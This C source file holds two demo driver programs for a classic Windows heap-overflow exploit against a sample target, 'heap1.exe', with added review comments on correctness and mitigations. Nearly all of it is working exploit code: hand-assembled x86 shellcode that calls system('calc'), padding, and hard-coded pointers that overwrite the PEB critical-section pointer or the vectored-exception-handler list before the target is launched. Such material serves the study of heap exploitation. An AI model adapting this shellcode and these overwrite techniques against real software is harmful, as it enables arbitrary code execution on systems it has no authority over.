/*
 * Demo driver for the "heap1.exe" target: assembles one double-quoted
 * command-line argument in buffer (shellcode, 58 x "DDDD" padding, then two
 * hard-coded little-endian pointers) and launches the target via system().
 *
 * GetAddress() and fixupaddresses() are defined elsewhere in this file. From
 * the calls here, GetAddress() appears to return an export's address (0 on
 * failure) and fixupaddresses() appears to write that address's bytes into
 * tmp for strcat() -- NOTE(review): confirm against their definitions, and
 * that they write at most 7 bytes plus NUL into the 8-byte tmp.
 * printf/strcpy/strcat/system are declared in <stdio.h>, <string.h> and
 * <stdlib.h>, none of which is visible in this excerpt.
 *
 * Review notes:
 *  - heap, pebf and shellcode are declared but never used.
 *  - buffer is unsigned char while strcpy/strcat/system take char *; most
 *    compilers accept this with a pointer-sign warning.
 *  - strcat() stops at the first 0x00 byte, so any NUL inside tmp or the
 *    literals below truncates what actually reaches buffer.
 *  - The trailing pointers (\x1C\xF0\xFD\x7f and \x88\x06\x35) are absolute
 *    addresses fixed at compile time; the demo only works if the target's
 *    PEB and heap are mapped at exactly those addresses. Address-space
 *    randomization and pointer-encoding mitigations exist to break this kind
 *    of fixed-address assumption.
 *  - Worst-case length: 6 + 15 + 7 + 16 + 7 + 2 + 232 + 4 + 3 + 1 = 293
 *    bytes plus NUL, so the 300-byte buffer itself cannot overflow.
 *
 * Returns 0 after launching; on lookup failure it returns the non-zero
 * character count from printf(), which becomes the process exit status.
 */
int main() {
    unsigned char buffer[300]="";
    unsigned char heap[8]="";        // unused
    unsigned char pebf[8]="";        // unused
    unsigned char shellcode[200]=""; // unused
    unsigned int address_of_system = 0;
    unsigned int address_of_RtlEnterCriticalSection = 0;
    unsigned char tmp[8]="";         // scratch for fixupaddresses() output
    unsigned int cnt = 0;

    printf("Getting addresses...\n");
    // These two addresses are resolved at run time; the two pointers
    // appended at the very end of buffer are not.
    address_of_system = GetAddress("msvcrt.dll","system");
    address_of_RtlEnterCriticalSection = GetAddress("ntdll.dll","RtlEnterCriticalSection");
    if(address_of_system == 0 || address_of_RtlEnterCriticalSection == 0)
        return printf("Failed to get addresses\n");
    printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system);
    printf("Address of ntdll.RtlEnterCriticalSection\t= %.8X\n",address_of_RtlEnterCriticalSection);

    // Target name, then the opening double quote of the single argument;
    // the matching closing quote is appended last.
    strcpy(buffer,"heap1 ");

    // Shellcode - repairs the PEB then calls system("calc");
    strcat(buffer,"\"\x90\x90\x90\x90\x01\x90\x90\x6A\x30\x59\x64\x8B\x01\xB9");
    fixupaddresses(tmp,address_of_RtlEnterCriticalSection);
    strcat(buffer,tmp);
    strcat(buffer,"\x89\x48\x20\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9");
    fixupaddresses(tmp,address_of_system);
    strcat(buffer,tmp);
    strcat(buffer,"\xFF\xD1");

    // Padding
    while(cnt < 58) {
        strcat(buffer,"DDDD");
        cnt ++;
    }

    // Pointer to RtlEnterCriticalSection pointer - 4 in PEB
    strcat(buffer,"\x1C\xF0\xFD\x7f");
    // Pointer to heap and thus shellcode
    strcat(buffer,"\x88\x06\x35");
    strcat(buffer,"\"");

    printf("\nExecuting heap1.exe... calc should open.\n");
    system(buffer);
    return 0;
}
/*
 * Second variant of the heap1.exe demo driver: same construction as the
 * first (0x90 filler, shellcode, 58 x "DDDD" padding, two hard-coded
 * pointers), but only msvcrt.system is resolved at run time and the final
 * two pointers refer to the vectored-exception-handler list rather than the
 * PEB (see the original comments kept below).
 *
 * GetAddress() and fixupaddresses() are defined elsewhere in this file --
 * NOTE(review): confirm that fixupaddresses() writes at most 7 bytes plus
 * NUL into the 8-byte tmp. printf/strcpy/strcat/system are declared in
 * <stdio.h>, <string.h> and <stdlib.h>, none of which is visible here.
 *
 * Review notes:
 *  - heap, pebf and shellcode are declared but never used.
 *  - buffer is unsigned char while strcpy/strcat/system take char *; most
 *    compilers accept this with a pointer-sign warning.
 *  - strcat() stops at the first 0x00 byte: the final literal
 *    "\x48\xff\x12\x00" therefore contributes only 3 bytes (its \x00 is the
 *    string terminator), and any NUL inside tmp truncates as well.
 *  - Both trailing pointers are absolute addresses fixed at compile time
 *    (the original comment already says to adjust 0x0012FF48 per system);
 *    address-space randomization exists to break this kind of fixed-address
 *    assumption.
 *  - Worst-case length: 6 + 20 + 14 + 7 + 2 + 232 + 4 + 3 = 288 bytes plus
 *    NUL, so the 300-byte buffer itself cannot overflow.
 *  - The ";;" after the "\xFF\xD1" strcat is a stray empty statement.
 *
 * Returns 0 after launching; on lookup failure it returns the non-zero
 * character count from printf(), which becomes the process exit status.
 */
int main() {
    unsigned char buffer[300]="";
    unsigned char heap[8]="";        // unused
    unsigned char pebf[8]="";        // unused
    unsigned char shellcode[200]=""; // unused
    unsigned int address_of_system = 0;
    unsigned char tmp[8]="";         // scratch for fixupaddresses() output
    unsigned int cnt = 0;

    printf("Getting address of system...\n");
    // Resolved at run time; the two pointers appended at the end are not.
    address_of_system = GetAddress("msvcrt.dll","system");
    if(address_of_system == 0)
        return printf("Failed to get address.\n");
    printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system);

    strcpy(buffer,"heap1 ");

    // 5 x 4 = 20 bytes of 0x90 filler ahead of the shellcode
    while(cnt < 5) {
        strcat(buffer,"\x90\x90\x90\x90");
        cnt ++;
    }

    // Shellcode to call system("calc");
    strcat(buffer,"\x90\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9");
    fixupaddresses(tmp,address_of_system);
    strcat(buffer,tmp);
    strcat(buffer,"\xFF\xD1");;

    // Padding (cnt is reused, so reset it first)
    cnt = 0;
    while(cnt < 58) {
        strcat(buffer,"DDDD");
        cnt ++;
    }

    // Pointer to 0x77FC3210 - 4. 0x77FC3210 holds
    // the pointer to the first _VECTORED_EXCEPTION_NODE
    // structure.
    strcat(buffer,"\x0C\x32\xFC\x77");
    // Pointer to our pseudo _VECTORED_EXCEPTION_NODE
    // structure at address 0x0012FF48. This address + 8
    // contains a pointer to our allocated buffer. This
    // is what will be called when the vectored exception
    // handling kicks in. Modify this according to where
    // it can be found on your system
    strcat(buffer,"\x48\xff\x12\x00");

    printf("\nExecuting heap1.exe... calc should open.\n");
    system(buffer);
    return 0;
}